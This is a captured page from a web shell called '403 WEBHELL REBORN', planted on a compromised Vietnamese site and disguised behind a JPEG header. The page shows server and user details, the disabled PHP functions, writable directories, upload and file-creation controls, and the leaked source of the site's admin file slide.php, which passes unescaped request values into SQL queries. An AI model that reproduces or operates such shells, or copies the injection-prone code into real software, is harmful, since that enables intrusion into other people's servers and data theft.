ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html////adminvn/slide.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true && check_level() >= 4) {
    if($_GET['type'] == 'add' & strlen($_POST['name']) >=3 && strlen($_POST['img']) > 1){
        if ($_POST['order'] != '1'){$_SESSION['slide_order'] = $_POST['order'] + '1';} else {$_SESSION['slide_order'] = '2';}
        @mysql_query("INSERT INTO cily_slides (slide_name, slide_content, slide_img, slide_imgfull, slide_url, slide_order) VALUES ('".addsla($_POST['name'])."', '".addsla($_POST['content'])."', '".$_POST['img']."', '".str_replace('thumbs-','',$_POST['img'])."', '".$_POST['url']."', '".$_POST['order']."')");
        header('Location: index.php?m=10');
    }
    
    elseif($_GET['type'] == 'edit'){
        
        @mysql_query("UPDATE cily_slides SET slide_name = '".addsla($_POST['name'])."', slide_content = '".addsla($_POST['content'])."', slide_img = '".$_POST['img']."', slide_imgfull = '".str_replace('thumbs-','',$_POST['img'])."', slide_url = '".$_POST['url']."', slide_order = '".$_POST['order']."' WHERE id = ".$_POST['id']);
        header('Location: index.php?m=10');
    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){
        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {
            $datapost = @mysql_fetch_array(@mysql_query("SELECT * FROM cily_slides WHERE id = ".$_POST['id'][$i]));
            $dtfullimg = @str_replace('thumbs-','',$datapost['slide_img']);
            $url = @str_replace(URL_SITE, "..", $dtfullimg);
            $thumb = @str_replace(URL_SITE, "..", $datapost['slide_img']);
            $deldata = $dtfullimg;

            if ($url != $thumb) {
                @unlink($url);
                @unlink($thumb);
            }
            @mysql_query("DELETE FROM cily_datas WHERE data_url LIKE '%".$deldata."%'");
            @mysql_query("DELETE FROM cily_slides WHERE id = ".$_POST['id'][$i]);
        }
        header('Location: index.php?m=10');
    }
    elseif($_GET['type'] == 'del' && $_POST['action'] == 2){
    $idm = $_POST["rowid"];
    $sttm = $_POST["idorder"];
    $lap=count($idm);
    for($i=0; $i<$lap; $i++) {
            @mysql_query("UPDATE cily_slides SET slide_order = ".$sttm[$i]." WHERE id = ".$idm[$i]);
    }
        Redirect("Thực hiện thành công","index.php?m=10");
    }
    elseif($_GET['type'] == 'state'){
        $getid = $_GET['id'];
        $getoc = $_GET['oc'];
    @mysql_query("UPDATE cily_slides SET slide_home = '".$getoc."' WHERE id = ".$getid);
         
        Redirect("","index.php?m=10");
    }
    
    else header('Location: index.php?m=10');
}

else echo "Hacking attempt";


?>

Anon7 - 2021